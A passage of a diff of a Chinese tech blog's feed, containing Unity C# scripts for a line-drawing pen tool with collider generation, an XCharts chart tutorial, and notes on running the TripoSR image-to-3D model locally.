    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    using UnityEngine;
    using UnityEngine.UI;
    using UnityEngine.EventSystems;
    using System.Collections;
    using System;
    public class DotController : MonoBehaviour, IDragHandler, IPointerClickHandler, IBeginDragHandler {

    [HideInInspector] public LineController line;
    [HideInInspector] public int index;

    public Action<DotController> OnDragEvent;
    public void OnDrag(PointerEventData eventData) {
    OnDragEvent?.Invoke(this);
    }

    public Action<DotController> OnRightClickEvent;
    public Action<LineController> OnLeftClickEvent;
    public void OnPointerClick(PointerEventData eventData) {
    if (eventData.pointerId == -2) {
    //Right Click
    OnRightClickEvent?.Invoke(this);
    }
    else if (eventData.pointerId == -1) {
    //Left Click
    OnLeftClickEvent?.Invoke(line);
    }
    }

    public void SetLine(LineController line) {
    this.line = line;
    }

    public void SetIndex(int index) {
    this.index = index;
    }

    public void OnBeginDrag(PointerEventData eventData) {
    if (eventData.pointerId == -1) {
    //Left Drag
    OnLeftClickEvent?.Invoke(line);
    }
    }
    }

    这段代码是一个名为 DotController 的 Unity 脚本,用于控制点的行为。主要功能包括:

    1. 实现了 IDragHandlerIPointerClickHandlerIBeginDragHandler 接口,以处理点的拖拽、鼠标点击和开始拖拽事件。
    2. 包含了一个公开的字段 line,用于存储点所属的线条对象。
    3. 包含了一个公开的字段 index,用于存储点在线条中的索引。
    4. 包含了 OnDragEventOnRightClickEventOnLeftClickEvent 三个事件,分别用于处理拖拽事件、右键点击事件和左键点击事件。
    5. 实现了 OnDrag 方法,用于在点被拖拽时触发相应的事件。
    6. 实现了 OnPointerClick 方法,根据鼠标点击的类型(左键或右键)来触发相应的事件。
    7. 实现了 SetLine 方法,用于设置点所属的线条对象。
    8. 实现了 SetIndex 方法,用于设置点在线条中的索引。
    9. 实现了 OnBeginDrag 方法,在开始拖拽事件中根据鼠标点击的类型来触发相应的事件。

    总体来说,这个脚本负责管理点对象的交互行为,包括拖拽、点击和开始拖拽事件的处理,以及与线条对象的关联和索引设置。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    using System;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;

    public class PenTool : MonoBehaviour
    {
    [Header("Pen Canvas")]
    [SerializeField] private PenCanvas penCanvas;

    [Header("Dots")]
    [SerializeField] private GameObject dotPrefab;
    [SerializeField] private Transform dotParent;

    [Header("Lines")]
    [SerializeField] private GameObject linePrefab;
    [SerializeField] private Transform lineParent;
    private LineController currentLine;

    [Header("Colors")]
    [SerializeField] private Color activeColor;
    [SerializeField] private Color normalColor;

    [Header("Loop Toggle")]
    [SerializeField] Image loopToggle;
    [SerializeField] Sprite loopSprite;
    [SerializeField] Sprite unloopSprite;

    private void Start() {
    penCanvas.OnPenCanvasLeftClickEvent += AddDot;
    penCanvas.OnPenCanvasRightClickEvent += EndCurrentLine;
    }

    public void ToggleLoop() {
    if (currentLine != null) {
    currentLine.ToggleLoop();
    loopToggle.sprite = (currentLine.isLooped()) ? unloopSprite : loopSprite;
    }
    }

    private void AddDot() {
    if (currentLine == null) {
    LineController lineController = Instantiate(linePrefab, Vector3.zero, Quaternion.identity, lineParent).GetComponent<LineController>();
    SetCurrentLine(lineController);
    }

    DotController dot = Instantiate(dotPrefab, GetMousePosition(), Quaternion.identity, dotParent).GetComponent<DotController>();
    dot.OnDragEvent += MoveDot;
    dot.OnRightClickEvent += RemoveDot;
    dot.OnLeftClickEvent += SetCurrentLine;

    currentLine.AddDot(dot);
    }

    private void RemoveDot(DotController dot) {
    dot.line.SplitPointsAtIndex(dot.index, out List<DotController> before, out List<DotController> after);

    Destroy(dot.line.gameObject);
    Destroy(dot.gameObject);

    LineController beforeLine = Instantiate(linePrefab, Vector3.zero, Quaternion.identity, lineParent).GetComponent<LineController>();
    for (int i = 0; i < before.Count; i++) {
    beforeLine.AddDot(before[i]);
    }

    LineController afterLine = Instantiate(linePrefab, Vector3.zero, Quaternion.identity, lineParent).GetComponent<LineController>();
    for (int i = 0; i < after.Count; i++) {
    afterLine.AddDot(after[i]);
    }
    }

    private void EndCurrentLine() {
    if (currentLine != null) {
    currentLine.SetColor(normalColor);
    loopToggle.enabled = false;
    currentLine = null;
    }
    }

    private void SetCurrentLine(LineController newLine) {
    EndCurrentLine();

    currentLine = newLine;
    currentLine.SetColor(activeColor);

    loopToggle.enabled = true;
    loopToggle.sprite = (currentLine.isLooped()) ? unloopSprite : loopSprite;
    }

    private void MoveDot(DotController dot) {
    dot.transform.position = GetMousePosition();
    }

    private Vector3 GetMousePosition() {
    Vector3 worldMousePosition = Camera.main.ScreenToWorldPoint(Input.mousePosition);
    worldMousePosition.z = 0;

    return worldMousePosition;
    }
    }

    这段代码是一个 Unity 脚本,名为 PenTool,用于实现一个绘图工具的功能。主要包括以下内容:

    1. Start 方法中订阅了 PenCanvas 的左键点击事件和右键点击事件,分别触发 AddDotEndCurrentLine 方法。
    2. ToggleLoop 方法用于切换当前线条是否闭合,并更新对应的 UI 图标。
    3. AddDot 方法用于在画布上添加一个点,并将点添加到当前线条中。
    4. RemoveDot 方法用于移除指定的点,并重新生成两个新的线条来连接剩余的点。
    5. EndCurrentLine 方法用于结束当前线条的绘制,并重置相关状态。
    6. SetCurrentLine 方法用于设置当前操作的线条,并更新相关状态。
    7. MoveDot 方法用于移动点的位置到鼠标位置。
    8. GetMousePosition 方法用于获取鼠标在世界坐标系中的位置。

    整体来说,这个脚本实现了绘图工具的核心功能,包括点和线条的创建、操作以及相关 UI 的更新。

    How to Detect COLLISIONS on a Line Renderer in Unity

    ​给 Line Prefab 绑上两个脚本:

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    using System.Collections;
    using System.Collections.Generic;
    using System.Linq;
    using UnityEngine;

    [RequireComponent(typeof(LineController), typeof(PolygonCollider2D))]
    public class LineCollision : MonoBehaviour {

    LineController lineController;
    PolygonCollider2D polygonCollider;

    private void Awake() {
    lineController = GetComponent<LineController>();
    polygonCollider = GetComponent<PolygonCollider2D>();
    }

    private void LateUpdate() {

    //Get all the positions from the line renderer
    Vector3[] positions = lineController.GetPositions();

    //If we have enough points to draw a line
    if (positions.Count() >= 2) {

    //Get the number of line between two points
    int numberOfLines = positions.Length - 1;

    //Make as many paths for each different line as we have lines
    polygonCollider.pathCount = numberOfLines;

    //Get Collider points between two consecutive points
    for (int i = 0; i < numberOfLines; i++) {
    //Get the two next points
    List<Vector2> currentPositions = new List<Vector2> {
    positions[i],
    positions[i+1]
    };

    List<Vector2> currentColliderPoints = CalculateColliderPoints(currentPositions);
    polygonCollider.SetPath(i, currentColliderPoints.ConvertAll(p => (Vector2)transform.InverseTransformPoint(p)));
    }
    }
    else {

    polygonCollider.pathCount = 0;
    }
    }

    private List<Vector2> CalculateColliderPoints(List<Vector2> positions) {
    //Get The Width of the Line
    float width = lineController.GetWidth();

    // m = (y2 - y1) / (x2 - x1)
    float m = (positions[1].y - positions[0].y) / (positions[1].x - positions[0].x);
    float deltaX = (width / 2f) * (m / Mathf.Pow(m * m + 1, 0.5f));
    float deltaY = (width / 2f) * (1 / Mathf.Pow(1 + m * m, 0.5f));

    //Calculate Vertex Offset from Line Point
    Vector2[] offsets = new Vector2[2];
    offsets[0] = new Vector2(-deltaX, deltaY);
    offsets[1] = new Vector2(deltaX, -deltaY);

    List<Vector2> colliderPoints = new List<Vector2> {
    positions[0] + offsets[0],
    positions[1] + offsets[0],
    positions[1] + offsets[1],
    positions[0] + offsets[1]
    };

    return colliderPoints;
    }
    }
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;

    public class LineController : MonoBehaviour
    {
    private LineRenderer lr;
    private List<DotController> dots;

    private void Awake() {
    lr = GetComponent<LineRenderer>();
    lr.positionCount = 0;

    dots = new List<DotController>();
    }

    public DotController GetFirstPoint() {
    return dots[0];
    }

    public void AddDot(DotController dot) {

    dot.SetLine(this);
    dot.SetIndex(dots.Count);

    lr.positionCount++;
    dots.Add(dot);
    }

    public void SplitPointsAtIndex(int index, out List<DotController> beforePoints, out List<DotController> afterPoints) {
    List<DotController> before = new List<DotController>();
    List<DotController> after = new List<DotController>();

    int i = 0;
    for (; i < index; i++) {
    before.Add(dots[i]);
    }
    i++;
    for (; i < dots.Count; i++) {
    after.Add(dots[i]);
    }

    beforePoints = before;
    afterPoints = after;

    dots.RemoveAt(index);
    }

    public void SetColor(Color color) {
    lr.startColor = color;
    lr.endColor = color;
    }

    public void ToggleLoop() {
    lr.loop = !lr.loop;
    }

    public bool isLooped() {
    return lr.loop;
    }

    private void LateUpdate() {
    if (dots.Count >= 2) {
    for (int i = 0; i < dots.Count; i++) {
    Vector3 position = dots[i].transform.position;
    position += new Vector3(0, 0, 5);

    lr.SetPosition(i, position);
    }
    }
    }

    public Vector3[] GetPositions() {
    Vector3[] positions = new Vector3[lr.positionCount];
    lr.GetPositions(positions);
    return positions;
    }

    public float GetWidth() {
    return lr.startWidth;
    }
    }

    ​如此,生成线条时就会附带对应的碰撞体。

    ]]>
    @@ -2710,7 +2710,7 @@ /posts/Unity-XCharts/ - 资源

    快速开始

    配置

    ​从 XCharts-Team/XCharts: A charting and data visualization library for Unity. Unity 数据可视化图表插件。(github.com) 把工程加载到 Assets/ 下的一个地方。

    ​之后就可以在 Hierarchy 右键创建一个 XCharts,我们创建一个 LineChart

    png

    ​可以在这个 LineChart 组件的基础上再绑上其它控制脚本。绑定 Examples/Example01_RandomData.cs

    自定义

    ​自定义脚本创建 LineChart

    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using XCharts.Runtime;

    public class ChartController : MonoBehaviour
    {
    // Start is called before the first frame update
    void Start()
    {
    // 创建 LineChart 对象
    var chart = gameObject.GetComponent<LineChart>();
    if (chart == null)
    {
    chart = gameObject.AddComponent<LineChart>();
    chart.Init();
    }
    chart.SetSize(580, 300); // 代码动态设置尺寸,或直接操作 chart.rectTransform,或直接在 Inspector 上改
    // 设置标题
    var title = chart.EnsureChartComponent<Title>();
    title.text = "Simple Line";
    // 设置提示框和图例是否显示
    var tooltip = chart.EnsureChartComponent<Tooltip>();
    tooltip.show = true;

    var legend = chart.EnsureChartComponent<Legend>();
    legend.show = false;
    // 设置坐标轴
    var xAxis = chart.EnsureChartComponent<XAxis>();
    xAxis.splitNumber = 10;
    xAxis.boundaryGap = true;
    xAxis.type = Axis.AxisType.Category;

    var yAxis = chart.EnsureChartComponent<YAxis>();
    yAxis.type = Axis.AxisType.Value;
    // 清空默认数据,添加 Line 类型的 Serie 用于接收数据
    chart.RemoveData();
    chart.AddSerie<Line>("line");
    // 添加 10 个数据
    for (int i = 0; i < 10; i++)
    {
    chart.AddXAxisData(i + "");
    chart.AddData(0, Random.Range(10, 20));
    }
    }

    // Update is called once per frame
    void Update()
    {

    }
    }

    ​写一个按下按钮追加数据的逻辑:

    public void onClick()
    {
    chart.AddXAxisData(chart.series[0].GetDataList().Count + "");
    chart.AddData(0, Random.Range(10, 20));
    }

    ​你还可以用代码控制更多的参数,Examples 下还有更多的其他例子,凡是 Inspector 上看到的可配置的参数,都可以通过代码来设置。XCharts 配置项手册 里面的所有参数都是可以通过代码控制的。

    ​另外,除非定制,建议调用 Chart 下提供的 public 接口,特别是数据相关操作部分。这些接口内部会做一些关联处理,比如刷新图表等。常见的接口有:

    1. chart.ClearData():清空图表数据(不移除 Series)
    2. chart.RemoveData():清除图表数据(会移除所有 Series)
    3. chart.AddSerie():添加 Serie
    4. chart.AddXAxisData():添加 X 轴数据
    5. chart.AddData():添加 Serie 数据
    6. chart.UpdateData():更新 Serie 数据
    7. chart.UpdateXAxisData():更新 X 轴数据
    8. chart.UpdateDataName():更新 Serie 数据的名字
    ]]>
    + 资源

    快速开始

    配置

    ​从 XCharts-Team/XCharts: A charting and data visualization library for Unity. Unity 数据可视化图表插件。(github.com) 把工程加载到 Assets/ 下的一个地方。

    ​之后就可以在 Hierarchy 右键创建一个 XCharts,我们创建一个 LineChart

    png

    ​可以在这个 LineChart 组件的基础上再绑上其它控制脚本。绑定 Examples/Example01_RandomData.cs

    自定义

    ​自定义脚本创建 LineChart

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using XCharts.Runtime;

    public class ChartController : MonoBehaviour
    {
    // Start is called before the first frame update
    void Start()
    {
    // 创建 LineChart 对象
    var chart = gameObject.GetComponent<LineChart>();
    if (chart == null)
    {
    chart = gameObject.AddComponent<LineChart>();
    chart.Init();
    }
    chart.SetSize(580, 300); // 代码动态设置尺寸,或直接操作 chart.rectTransform,或直接在 Inspector 上改
    // 设置标题
    var title = chart.EnsureChartComponent<Title>();
    title.text = "Simple Line";
    // 设置提示框和图例是否显示
    var tooltip = chart.EnsureChartComponent<Tooltip>();
    tooltip.show = true;

    var legend = chart.EnsureChartComponent<Legend>();
    legend.show = false;
    // 设置坐标轴
    var xAxis = chart.EnsureChartComponent<XAxis>();
    xAxis.splitNumber = 10;
    xAxis.boundaryGap = true;
    xAxis.type = Axis.AxisType.Category;

    var yAxis = chart.EnsureChartComponent<YAxis>();
    yAxis.type = Axis.AxisType.Value;
    // 清空默认数据,添加 Line 类型的 Serie 用于接收数据
    chart.RemoveData();
    chart.AddSerie<Line>("line");
    // 添加 10 个数据
    for (int i = 0; i < 10; i++)
    {
    chart.AddXAxisData(i + "");
    chart.AddData(0, Random.Range(10, 20));
    }
    }

    // Update is called once per frame
    void Update()
    {

    }
    }

    ​写一个按下按钮追加数据的逻辑:

    1
    2
    3
    4
    5
    public void onClick()
    {
    chart.AddXAxisData(chart.series[0].GetDataList().Count + "");
    chart.AddData(0, Random.Range(10, 20));
    }

    ​你还可以用代码控制更多的参数,Examples 下还有更多的其他例子,凡是 Inspector 上看到的可配置的参数,都可以通过代码来设置。XCharts 配置项手册 里面的所有参数都是可以通过代码控制的。

    ​另外,除非定制,建议调用 Chart 下提供的 public 接口,特别是数据相关操作部分。这些接口内部会做一些关联处理,比如刷新图表等。常见的接口有:

    1. chart.ClearData():清空图表数据(不移除 Series)
    2. chart.RemoveData():清除图表数据(会移除所有 Series)
    3. chart.AddSerie():添加 Serie
    4. chart.AddXAxisData():添加 X 轴数据
    5. chart.AddData():添加 Serie 数据
    6. chart.UpdateData():更新 Serie 数据
    7. chart.UpdateXAxisData():更新 X 轴数据
    8. chart.UpdateDataName():更新 Serie 数据的名字
    ]]>
    @@ -2735,7 +2735,7 @@ /posts/Paper-TripoSR-Fast%203D%20Object%20Reconstruction%20from%20a%20Single%20Image/ - 资源

    全文

    Abatract

    ​TripoSR 是一个使用 transformer 进行快速 Feed-forward 3D 生成的 3D 重建模型。在 LRM 网络架构(ICLR 2024 Oral | Adobe 提出 LRM:单个图像到 3D 的大型重建模型 - 知乎 (zhihu.com))的基础上,TripoSR 集成了数据处理、模型设计和训练技术方面的实质性改进。

    1. Introduction

    ​近期三维重建获得数据的办法:利用 2D 扩散模型从文本提示或输入图像创建 3D 资产。(利用 2D 先验进行 3D 生成)但是效率低。

    ​Feed-forward 3D 重建模型实现了显著更高的计算效率。沿着这个方向,最近的几种方法在不同的 3D 数据集上的可扩展训练中显示出了前景。

    2. TripoSR: Data and Model Improvements

    ​TripoSR 的设计基于 LRM,在数据管理、模型和训练策略方面取得了一系列技术进步。现在,我们对模型进行概述,然后进行技术改进。

    2.1. Model Overview

    ​TripoSR 的核心包括以下组件:

    • 图像编码器(image encoder)
      • 使用预先训练的视觉变换器模型 DINOv1 进行初始化,该模型将 RGB 图像投影到一组潜在向量中。这些矢量对图像的全局和局部特征进行编码,并包括重建 3D 对象所需的信息。
    • 图像到三平面解码器(image-to-triplane decoder)
      • 将潜在矢量变换到三平面 NeRF 表示上。
    • 基于三平面的神经辐射场(an image-to-triplane decoder, NeRF)。
      • NeRF 模型由一堆多层感知器(MLP)组成,这些感知器负责预测空间中 3D 点的颜色和密度。

    2.2. Data Improvements

    • 数据整理:通过选择一个精心策划的 Objaverse 数据集子集,该子集在 CC-By 许可证下可用,我们提高了训练数据的质量。
    • 数据渲染:我们采用了一系列不同的数据渲染技术,这些技术更接近于模拟真实世界图像的分布,从而增强了模型的泛化能力,即使是在专门使用 Objaverse 数据集进行训练的情况下也是如此。

    2.3. Model and Training Improvements

    • 三平面通道优化

    • Mask Loss

      • 在训练过程中引入了 Mask Loss,显著减少了“漂浮物”伪影,并提高了重建的保真度
    • Local Rendering Supervision.

    3. Results

    评估数据集。我们策划了两个公共数据集,GSO 和 OmniObject3D,用于评估。我们发现,这两个数据集都包括许多简单形状的对象(例如,长方体、球体或圆柱体),因此可能导致对这些简单形状的高度验证偏差。因此,我们手动过滤数据集,并从每个数据集中选择大约 300 个对象,以确保它们形成一个多样且具有代表性的公共对象集合。

    三维形状度量。我们使用 Marching Cubes 提取等值面,将隐式 3D 表示(如 NeRF)转换为网格。我们从这些曲面中采样 10K 个点,以计算倒角距离(CD)和 Fscore(FS)。考虑到一些方法无法预测以视图为中心的形状,我们使用蛮力搜索方法将预测与地面实况形状对齐。

    定量比较。我们将 TripoSR 与使用前馈技术的现有最先进的 3D 重建基线进行了比较,包括 One-2-345、三平面高斯(TGS)、ZeroShape 和 OpenLRM。

    性能与运行时。TripoSR 的另一个关键优势是它的推理速度。在 NVIDIA A100 GPU 上从单个图像生成 3D 网格大约需要 0.5 秒。

    4. Conclusion

    ​我们希望 TripoSR 能够帮助研究人员和开发人员开发更先进的 3D 生成人工智能模型。

    开跑

    ​可以到 TripoSR - a Hugging Face Space by stabilityai 在线玩,也可以尝试离线部署。

    ​从 VAST-AI-研究/TripoSR (github.com) 获取代码仓库。

    ​整一个虚拟环境:

    conda create -n TripoSR python=3.9

    ​装好 pytorch 后,在代码仓库里装好库:

    pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

    ​看一下 run.py 里的 argparse:

    参数解释
    image接受一个或多个字符串作为输入,表示输入图像的路径。
    –device指定要使用的设备,如果没有找到兼容 CUDA 的设备,则会回退到使用 CPU。默认为 ‘cuda:0’。
    –pretrained-model-name-or-path指定预训练模型的路径或名称,可以是 huggingface 模型 id 或本地路径。默认为 ‘stabilityai/TripoSR’。
    –chunk-size表示用于表面提取和渲染的评估块大小。较小的块大小会减少 VRAM 使用量,但会增加计算时间。设置为 0 表示不分块。默认为 8192。
    –mc-resolutionMarching cubes 网格的分辨率。默认为 256。
    –no-remove-bg如果指定此选项,则不会自动从输入图像中移除背景,输入图像应为带有灰色背景和正确尺寸前景的 RGB 图像。默认为 false。
    –foreground-ratio前景大小与图像大小的比例。仅在未指定 --no-remove-bg 时使用。默认为 0.85。
    –output-dir保存结果的输出目录。默认为 ‘output/’。
    –model-save-format保存提取的网格的格式,可选项为 'obj’或 ‘glb’。默认为 ‘obj’。
    –render如果指定此选项,则保存一个 NeRF 渲染的视频。默认为 false。

    ​由于墙内下载 huggingface 的模型容易失败,改为采用离线加载模型的形式。修改 run.py 里的内容:

    parser.add_argument(
    "--pretrained-model-name-or-path",
    default= "models/", # "stabilityai/TripoSR",
    type=str,
    help="Path to the pretrained model. Could be either a huggingface model id is or a local path. Default: 'stabilityai/TripoSR'",
    )

    ​从 stabilityai/TripoSR at main (huggingface.co) 下载 config.yamlmodel.ckptmodels/ 下:

    放置模型

    ​准备一张模型图片,就决定是你了!淘宝吉祥物!

    阿里吉祥物

    ​开跑!

    python run.py examples/XXX.png --output-dir output/

    ​emmm 还是下了一个叫 'https://github.com/danielgatis/rembg/releases/download/v0.0.0/u2net.onnx' 的东西,还好没被墙。

    2024-03-18 11:02:00,713 - INFO - Initializing model ...
    Downloading config.json: 100%|█████████████████████████████████████████████████████████| 454/454 [00:00<00:00, 149kB/s]
    C:\Users\19048\.conda\envs\TripoSR\lib\site-packages\huggingface_hub\file_download.py:137: UserWarning: `huggingface_hub` cache-system uses symlinks by default to efficiently store duplicated files but your machine does not support them in C:\Users\19048\.cache\huggingface\hub. Caching files will still work but in a degraded version that might require more space on your disk. This warning can be disabled by setting the `HF_HUB_DISABLE_SYMLINKS_WARNING` environment variable. For more details, see https://huggingface.co/docs/huggingface_hub/how-to-cache#limitations.
    To support symlinks on Windows, you either need to activate Developer Mode or to run Python as an administrator. In order to see activate developer mode, see this article: https://docs.microsoft.com/en-us/windows/apps/get-started/enable-your-device-for-development
    warnings.warn(message)
    2024-03-18 11:02:07,536 - INFO - Initializing model finished in 6819.83ms.
    2024-03-18 11:02:07,539 - INFO - Processing images ...
    Downloading data from 'https://github.com/danielgatis/rembg/releases/download/v0.0.0/u2net.onnx' to file 'C:\Users\19048\.u2net\u2net.onnx'.
    100%|########################################| 176M/176M [00:00<00:00, 117GB/s]
    2024-03-18 11:02:30,617 - INFO - Processing images finished in 23078.31ms.
    2024-03-18 11:02:30,617 - INFO - Running image 1/1 ...
    2024-03-18 11:02:30,618 - INFO - Running model ...
    2024-03-18 11:02:35,306 - INFO - Running model finished in 4686.22ms.
    2024-03-18 11:02:35,306 - INFO - Exporting mesh ...
    torchmcubes was not compiled with CUDA support, use CPU version instead.
    2024-03-18 11:02:37,869 - INFO - Exporting mesh finished in 2563.17ms.

    ​这个程序会自动帮你抠图:

    自动扣图

    ​不过抠得不是很好,导致生成的模型多了点背景信息。我们手动抠图再试一次:

    手动抠图

    ​用 Blender 打开这个模型,修复一下旋转。生成的模型显示不出纹理信息,按 stabilityai/TripoSR · It doesn’t save texture to the .obj? (huggingface.co) 所说,应该在 Blender 里设置一下材质(将 Color Attribute 节点连接到 Base Color 里,但好像有些模型还是不行……):

    设置材质

    ​顺便送这个模型一个 Decimate 减少一下面数再导出,真是太棒了!

    ]]>
    + 资源

    全文

    Abatract

    ​TripoSR 是一个使用 transformer 进行快速 Feed-forward 3D 生成的 3D 重建模型。在 LRM 网络架构(ICLR 2024 Oral | Adobe 提出 LRM:单个图像到 3D 的大型重建模型 - 知乎 (zhihu.com))的基础上,TripoSR 集成了数据处理、模型设计和训练技术方面的实质性改进。

    1. Introduction

    ​近期三维重建获得数据的办法:利用 2D 扩散模型从文本提示或输入图像创建 3D 资产。(利用 2D 先验进行 3D 生成)但是效率低。

    ​Feed-forward 3D 重建模型实现了显著更高的计算效率。沿着这个方向,最近的几种方法在不同的 3D 数据集上的可扩展训练中显示出了前景。

    2. TripoSR: Data and Model Improvements

    ​TripoSR 的设计基于 LRM,在数据管理、模型和训练策略方面取得了一系列技术进步。现在,我们对模型进行概述,然后进行技术改进。

    2.1. Model Overview

    ​TripoSR 的核心包括以下组件:

    • 图像编码器(image encoder)
      • 使用预先训练的视觉变换器模型 DINOv1 进行初始化,该模型将 RGB 图像投影到一组潜在向量中。这些矢量对图像的全局和局部特征进行编码,并包括重建 3D 对象所需的信息。
    • 图像到三平面解码器(image-to-triplane decoder)
      • 将潜在矢量变换到三平面 NeRF 表示上。
    • 基于三平面的神经辐射场(an image-to-triplane decoder, NeRF)。
      • NeRF 模型由一堆多层感知器(MLP)组成,这些感知器负责预测空间中 3D 点的颜色和密度。

    2.2. Data Improvements

    • 数据整理:通过选择一个精心策划的 Objaverse 数据集子集,该子集在 CC-By 许可证下可用,我们提高了训练数据的质量。
    • 数据渲染:我们采用了一系列不同的数据渲染技术,这些技术更接近于模拟真实世界图像的分布,从而增强了模型的泛化能力,即使是在专门使用 Objaverse 数据集进行训练的情况下也是如此。

    2.3. Model and Training Improvements

    • 三平面通道优化

    • Mask Loss

      • 在训练过程中引入了 Mask Loss,显著减少了“漂浮物”伪影,并提高了重建的保真度
    • Local Rendering Supervision.

    3. Results

    评估数据集。我们策划了两个公共数据集,GSO 和 OmniObject3D,用于评估。我们发现,这两个数据集都包括许多简单形状的对象(例如,长方体、球体或圆柱体),因此可能导致对这些简单形状的高度验证偏差。因此,我们手动过滤数据集,并从每个数据集中选择大约 300 个对象,以确保它们形成一个多样且具有代表性的公共对象集合。

    三维形状度量。我们使用 Marching Cubes 提取等值面,将隐式 3D 表示(如 NeRF)转换为网格。我们从这些曲面中采样 10K 个点,以计算倒角距离(CD)和 Fscore(FS)。考虑到一些方法无法预测以视图为中心的形状,我们使用蛮力搜索方法将预测与地面实况形状对齐。

    定量比较。我们将 TripoSR 与使用前馈技术的现有最先进的 3D 重建基线进行了比较,包括 One-2-345、三平面高斯(TGS)、ZeroShape 和 OpenLRM。

    性能与运行时。TripoSR 的另一个关键优势是它的推理速度。在 NVIDIA A100 GPU 上从单个图像生成 3D 网格大约需要 0.5 秒。

    4. Conclusion

    ​我们希望 TripoSR 能够帮助研究人员和开发人员开发更先进的 3D 生成人工智能模型。

    开跑

    ​可以到 TripoSR - a Hugging Face Space by stabilityai 在线玩,也可以尝试离线部署。

    ​从 VAST-AI-研究/TripoSR (github.com) 获取代码仓库。

    ​整一个虚拟环境:

    1
    conda create -n TripoSR python=3.9

    ​装好 pytorch 后,在代码仓库里装好库:

    1
    pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

    ​看一下 run.py 里的 argparse:

    参数解释
    image接受一个或多个字符串作为输入,表示输入图像的路径。
    –device指定要使用的设备,如果没有找到兼容 CUDA 的设备,则会回退到使用 CPU。默认为 ‘cuda:0’。
    –pretrained-model-name-or-path指定预训练模型的路径或名称,可以是 huggingface 模型 id 或本地路径。默认为 ‘stabilityai/TripoSR’。
    –chunk-size表示用于表面提取和渲染的评估块大小。较小的块大小会减少 VRAM 使用量,但会增加计算时间。设置为 0 表示不分块。默认为 8192。
    –mc-resolutionMarching cubes 网格的分辨率。默认为 256。
    –no-remove-bg如果指定此选项,则不会自动从输入图像中移除背景,输入图像应为带有灰色背景和正确尺寸前景的 RGB 图像。默认为 false。
    –foreground-ratio前景大小与图像大小的比例。仅在未指定 --no-remove-bg 时使用。默认为 0.85。
    –output-dir保存结果的输出目录。默认为 ‘output/’。
    –model-save-format保存提取的网格的格式,可选项为 'obj’或 ‘glb’。默认为 ‘obj’。
    –render如果指定此选项,则保存一个 NeRF 渲染的视频。默认为 false。

    ​由于墙内下载 huggingface 的模型容易失败,改为采用离线加载模型的形式。修改 run.py 里的内容:

    1
    2
    3
    4
    5
    6
    parser.add_argument(
    "--pretrained-model-name-or-path",
    default= "models/", # "stabilityai/TripoSR",
    type=str,
    help="Path to the pretrained model. Could be either a huggingface model id is or a local path. Default: 'stabilityai/TripoSR'",
    )

    ​从 stabilityai/TripoSR at main (huggingface.co) 下载 config.yamlmodel.ckptmodels/ 下:

    放置模型

    ​准备一张模型图片,就决定是你了!淘宝吉祥物!

    阿里吉祥物

    ​开跑!

    1
    python run.py examples/XXX.png --output-dir output/

    ​emmm 还是下了一个叫 'https://github.com/danielgatis/rembg/releases/download/v0.0.0/u2net.onnx' 的东西,还好没被墙。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    2024-03-18 11:02:00,713 - INFO - Initializing model ...
    Downloading config.json: 100%|█████████████████████████████████████████████████████████| 454/454 [00:00<00:00, 149kB/s]
    C:\Users\19048\.conda\envs\TripoSR\lib\site-packages\huggingface_hub\file_download.py:137: UserWarning: `huggingface_hub` cache-system uses symlinks by default to efficiently store duplicated files but your machine does not support them in C:\Users\19048\.cache\huggingface\hub. Caching files will still work but in a degraded version that might require more space on your disk. This warning can be disabled by setting the `HF_HUB_DISABLE_SYMLINKS_WARNING` environment variable. For more details, see https://huggingface.co/docs/huggingface_hub/how-to-cache#limitations.
    To support symlinks on Windows, you either need to activate Developer Mode or to run Python as an administrator. In order to see activate developer mode, see this article: https://docs.microsoft.com/en-us/windows/apps/get-started/enable-your-device-for-development
    warnings.warn(message)
    2024-03-18 11:02:07,536 - INFO - Initializing model finished in 6819.83ms.
    2024-03-18 11:02:07,539 - INFO - Processing images ...
    Downloading data from 'https://github.com/danielgatis/rembg/releases/download/v0.0.0/u2net.onnx' to file 'C:\Users\19048\.u2net\u2net.onnx'.
    100%|########################################| 176M/176M [00:00<00:00, 117GB/s]
